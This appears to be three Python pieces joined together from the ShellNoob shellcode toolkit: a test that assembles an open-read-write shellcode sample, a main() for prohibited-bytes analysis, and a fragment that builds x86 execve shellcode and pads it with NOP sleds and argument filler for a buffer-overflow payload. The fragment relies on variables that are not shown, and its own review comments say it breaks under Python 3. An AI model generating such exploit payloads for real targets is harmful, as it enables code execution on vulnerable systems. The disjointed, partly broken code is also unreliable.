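def test_get_start_address():
    """Assemble the open-read-write sample to an executable and check that
    ``ShellNoob.get_start_address`` reports its entry point as a hex string.

    Returns:
        ``(stdout, stderr, 0)``: the captured output of the ``--to-exe``
        run, in the same shape the other tests of this module return.

    Raises:
        Exception: the running kernel is neither Linux nor FreeBSD, so no
            sample assembly exists for it.
        AssertionError: the conversion to an executable failed, or the
            reported start address does not look like ``0x...``.
    """
    samples = {
        'Linux': 'samples/x86-linux/open-read-write.asm',
        'FreeBSD': 'samples/x86-freebsd/open-read-write.asm',
    }
    kernel = ShellNoob.get_kernel()
    # Decide support before touching the disk, so an unsupported host
    # leaves neither a temp dir nor /tmp/secret behind.
    if kernel not in samples:
        raise Exception('testing on kernel %s not supported' % kernel)

    stdout, stderr = '', ''
    tmp_dir = mkdtemp()
    asm_fp = join(tmp_dir, 'shellcode.asm')
    exe_fp = join(tmp_dir, 'shellcode.exe')
    # The sample shellcode opens this fixed path, so it cannot live inside
    # tmp_dir. Written directly rather than through os.system('echo ...'):
    # no shell is spawned and the content is not re-interpreted by one.
    secret_fp = '/tmp/secret'
    try:
        with open(secret_fp, 'w') as f:
            # echo appended a trailing newline; keep the file byte-identical
            # (assumes SECRET_STR is plain text, as the old echo did).
            f.write(SECRET_STR + '\n')
        shutil.copyfile(join(dirname(__file__), samples[kernel]), asm_fp)

        _out, _err, _val = run_with_args('%s --to-exe' % asm_fp)
        stdout += _out
        stderr += _err
        assert _val == 0, 'conversion to exe failed: %s' % _err

        start_addr = ShellNoob().get_start_address(exe_fp)
        assert re.match(r'0x[0-9a-f]+', start_addr), start_addr
    finally:
        # Clean up even when an assertion fails, so reruns start clean and
        # the secret does not linger in the shared temp directory.
        shutil.rmtree(tmp_dir, ignore_errors=True)
        if os.path.exists(secret_fp):
            os.unlink(secret_fp)
    return stdout, stderr, 0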
def main(argv):
    """Main method.

    Parses ``argv[1:]`` (``argv[0]`` is the program name), builds a
    ``ShellNoob`` from the parsed ``is_64`` and ``intel`` options, prints a
    hex dump of the extracted shellcode and then the prohibited-bytes
    analysis for it.
    """
    options = parser.parse_args(argv[1:])
    snoob = ShellNoob(options.is_64, options.intel)
    # Hex string of the shellcode taken from options.fp in format options.fmt.
    code = extract_hex_code(snoob, options.fmt, options.fp)
    print_hex_dump(hex_dump(code))
    # Presumably the instructions that violate the black/whitelist of bytes;
    # the helper's exact result shape is not visible here.
    findings = prohibited_bytes_analysis(
        snoob, code, options.blacklist, options.whitelist)
    print_prohibited_bytes_analysis(findings)
# Fragment of a script: hex_code, final_str, shell_code, str, from_range,
# to_range and argv are assigned earlier and are not visible here.
# NOTE(review): `str` is the builtin type name being used as a variable;
# renaming it needs the earlier (unseen) assignment as well.
# Emit one "push $0x<8 hex chars>" per group of 8 hex characters, pushing
# whatever is left after the loop.
for count in range(len(hex_code)):
    if count > 0 and count % 8 == 0:
        final_str += "push $0x%s \n" % str
        str = ""
    str += hex_code[count]
final_str += "push $0x%s \n" % str
# NOTE(review): the three adjacent literals are concatenated at parse time
# and then .encode("utf-8") applies to the whole literal; on Python 3 that is
# bytes and `str + bytes` raises TypeError — this looks Python-2-only.
shell_code += final_str + "movl %esp,%ebx\npush %eax\n" \
    "push %ebx\nmov %esp, %ecx\nmovl %eax, %edx\nmov $11,%al\nint $0x80\nxor %eax,%eax\nmov $1,%al" \
    "\nxor %ebx,%ebx\nint $0x80".encode("utf-8")
# output_file = open("shell.asm", "w")
# output_file.write(shell_code)
# output_file.close()
sn = ShellNoob(flag_intel=False)
hex_code = sn.asm_to_hex(shell_code)
# Re-render the hex string as "\x.." escapes, one per byte (two hex chars).
hc = "\\x"
for i in range(0, len(hex_code)):
    # NOTE(review): `is 0` is an identity test that only works because
    # CPython caches small ints; it should be `== 0`.
    if i > 0 and i % 2 is 0:
        hc += "\\x"
    hc += hex_code[i]
# hc.count('x') is the byte count of hc, so diff is the padding still needed
# to fill the [from_range, to_range) window.
diff = to_range - from_range - hc.count('x')
# NOTE(review): on Python 3 `diff / 2` is a float and `float * str` raises
# TypeError, and argv[2].decode() only exists on bytes — Python 2 semantics
# again. hc is also re-padded on every iteration rather than rebuilt from a
# saved base; confirm that is intended. The loop body may continue past this
# fragment.
for i in range(0, 6):
    hc = i * "\\x90" + (diff / 2 * "\\x90") + hc + (diff / 2 * argv[2].decode())